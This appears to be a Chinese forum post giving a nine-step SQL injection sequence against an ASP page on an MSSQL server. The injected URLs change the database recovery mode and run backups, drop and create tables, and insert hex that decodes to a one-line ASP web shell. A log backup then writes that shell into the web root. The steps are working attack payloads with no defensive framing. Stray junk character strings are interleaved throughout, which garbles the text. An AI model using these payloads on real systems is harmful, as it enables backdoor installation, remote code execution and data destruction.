第一步4 y7 s- e# K# e9 q9 h' r, V: n
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
, p$ Z! U# N+ d2 O
6 r& H3 J9 n" g0 p第二步:) k# N K, W. i" I
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
6 t6 f @1 U% B2 }4 w! n9 \" P6 M
第三步$ U: _, }5 E8 j( ?+ _& i* [
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--' `/ F6 ^% M1 o6 k2 @$ U# v
# f, Y# [3 s" l# K6 z* S7 O E
第四步
- l: ]0 F0 U1 D% @http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
7 t8 t( Q+ d( G, I! J5 [) Q. }" v4 M9 a1 t$ n
第五步
3 V5 o2 O9 t5 X3 w% c0 x2 |& ~http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--: f0 i& R N! u+ C8 x+ h
: N2 b6 Q1 a: g% \
第六步
- k q' t: A' s1 I8 F7 chttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--: M* W" p8 l- N/ D( S
. P) F( w9 }% ? d第七步& s$ a8 S z5 v5 E0 X0 ?
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--& z; H8 U$ Z1 G3 A2 l. P8 p
0 E) Z' c: ?7 _7 z& `- ^' Z
第八步, v. M- v' |; f3 _& W/ O
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--' M) V- l" v! c2 B
$ s. E+ G3 v4 `: g, T+ |1 y! I
第九步
! D- V- X" P$ qhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--0 U% @) h$ Z* W7 _- e! w
|